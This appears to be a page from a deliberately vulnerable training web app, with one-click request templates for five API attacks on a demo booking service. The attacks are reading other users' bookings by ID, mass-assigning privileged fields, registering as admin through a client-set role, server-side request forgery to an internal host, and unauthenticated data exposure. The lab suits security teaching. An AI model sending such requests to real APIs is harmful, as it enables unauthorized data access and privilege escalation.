Push-button exploit helpers.
Read another customer’s booking by ID
Endpoint: GET /api/bookings/{id}
Why vulnerable: You are authenticated as one customer, but the server does not enforce ownership checks on the booking object referenced by the ID.
{
"identity": "customer (alice)",
"method": "GET",
"url": "/api/bookings/2",
"headers": {
"Authorization": "Bearer "
}
}
(Try it)
(Explanation will appear here after you Try it.)
Customer performs privileged booking status update
Endpoint: PATCH /api/bookings/{id}
Why vulnerable:
A customer can perform privileged actions (status transitions + union flags) that should
be restricted to authorized roles. The server trusts fields like union_override.
{
"identity": "customer (alice)",
"method": "PATCH",
"url": "/api/bookings/1",
"headers": {
"Authorization": "Bearer ",
"Content-Type": "application/json"
},
"body": {
"status": "accepted",
"union_override": true,
"price_quoted": 1
}
}
(Try It)
(Explanation will appear here after you Try It.)
Self-register as admin
Endpoint: POST /api/auth/register
Why vulnerable:
The API accepts client-controlled fields like role during registration,
enabling privilege escalation.
{
"identity": "unauthenticated",
"method": "POST",
"url": "/api/auth/register",
"headers": {
"Content-Type": "application/json"
},
"body": {
"email": "pwn####@demo.local",
"password": "password",
"role": "admin"
}
}
(Try It)
(Explanation will appear here after you Try It.)
Fetch internal service content via attachmentUrl
Endpoint: POST /api/support/tickets
Why vulnerable:
The server fetches attachmentUrl server-side without adequate allow-listing,
enabling access to internal services.
{
"identity": "customer (alice)",
"method": "POST",
"url": "/api/support/tickets",
"headers": {
"Authorization": "Bearer ",
"Content-Type": "application/json"
},
"body": {
"message": "pls see attachment",
"attachmentUrl": "http://internal-mock:9000/internal/flag"
}
}
(Try It)
(Explanation will appear here after you Try It.)
Sensitive capybara fields returned without auth
Endpoint: GET /api/capybaras/{id}
Why vulnerable:
The API should require an Authorization header, but it returns data even when the
request is unauthenticated (Broken Auth). The response also includes internal/sensitive fields
(Excessive Data Exposure).
{
"identity": "unauthenticated",
"method": "GET",
"url": "/api/capybaras/1",
"headers": {}
}
(Try It)
(Explanation will appear here after you Try It.)